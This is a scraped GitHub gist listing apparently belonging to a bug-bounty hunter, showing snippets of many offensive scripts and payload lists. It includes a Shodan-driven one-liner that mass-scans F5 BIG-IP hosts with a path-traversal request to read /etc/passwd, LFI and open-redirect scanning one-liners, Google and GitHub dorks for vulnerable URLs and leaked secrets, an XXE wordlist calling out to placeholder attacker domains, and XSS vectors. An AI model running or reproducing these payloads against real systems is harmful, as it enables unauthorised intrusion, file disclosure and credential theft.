Mr RK ravkishu

@ravkishu
ravkishu / byp4xx.sh
Created February 7, 2021 14:09
Simple bash script to bypass "403 Forbidden" messages with well-known methods discussed in #bugbountytips
#!/bin/bash
# Credits: https://github.com/lobuhi/byp4xx
#INTRO
echo -e "\e[1m\e[32m __ \e[1m\e[31m__ __ "
echo -e "\e[1m\e[32m / /_ __ ______ \e[1m\e[31m/ // / _ ___ __"
echo -e "\e[1m\e[32m / __ \/ / / / __ \ \e[1m\e[31m/ // /_| |/_/ |/_/"
echo -e "\e[1m\e[32m / /_/ / /_/ / /_/ /\e[1m\e[31m/__ __/> <_> < "
echo -e "\e[1m\e[32m/_.___/\__, / .___/ \e[1m\e[31m/_/ /_/|_/_/|_| "
echo -e "\e[1m\e[32m /____/_/ "
@ravkishu
ravkishu / common_bucket.txt
Last active October 8, 2020 20:59
aws s3 bucket | prefixes | enumeration | names | mutations
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
    r = requests.get(
        'https://web.archive.org/cdx/search/cdx'
        '?url=%s/robots.txt&output=json&fl=timestamp,original'
        '&filter=statuscode:200&collapse=digest' % host)
“Hackme.tld” API_key
“Hackme.tld” secret_key
“Hackme.tld” aws_key
“Hackme.tld” Password
“Hackme.tld” FTP
“Hackme.tld” login
“Hackme.tld” github_token
“Hackme.tld” http:// & https:// 
“Hackme.tld” amazonaws
“Hackme.tld” digitaloceanspaces
@ravkishu
ravkishu / dork
Created September 22, 2020 15:33 — forked from pikpikcu/dork
for ((i=1;i<=10;i++));do curl -i -s -k -L -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" "https://www.google.com/search?sourceid=chrome-psyapi2&ion=1&espv=2&ie=UTF-8&start=${i}0&q=.php?id=" | grep -Eo 'href="[^\"]+"' | grep -Po "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep ".php?id" | sort -u ;done
@ravkishu
ravkishu / bash_aliases.sh
Created September 22, 2020 15:02 — forked from dwisiswant0/bash_aliases.sh
One-liner to get Open-redirect & LFI
lfi() {
gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
}
open-redirect() {
local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
}
@ravkishu
ravkishu / rce.sh
Created September 17, 2020 10:12 — forked from Mad-robot/rce.sh
Shodan Big Ip RCE
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
#sudo apt install curl
#sudo apt install python3-shodan
#shodan init YOUR_API_KEY
@ravkishu
ravkishu / xxe-payloads.txt
Created September 15, 2020 14:32 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@ravkishu
ravkishu / gist:1028500db79c6e91e0861eab8d8c7711
Created September 15, 2020 14:31 — forked from sempf/gist:f44714afe0050b83b6e647261d53b43e
666 XSS Vectors collected from the web
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@ravkishu
ravkishu / WinGitDork.sh
Created September 12, 2020 13:36
GitHub Dorking Script Windows Git
#!/bin/bash
FILE=./GitHubDorking.sh
if [ -f "$FILE" ]; then
    echo "$FILE file exists."
else
    wget "https://gist.github.com/ravkishu/d0c8d095ef58d649af136f07b8a8626c/raw/e211d8ec3ca94035ded3163ea1a80c7b3f0fb574/GitHubDorking.sh"
fi
chmod +x GitHubDorking.sh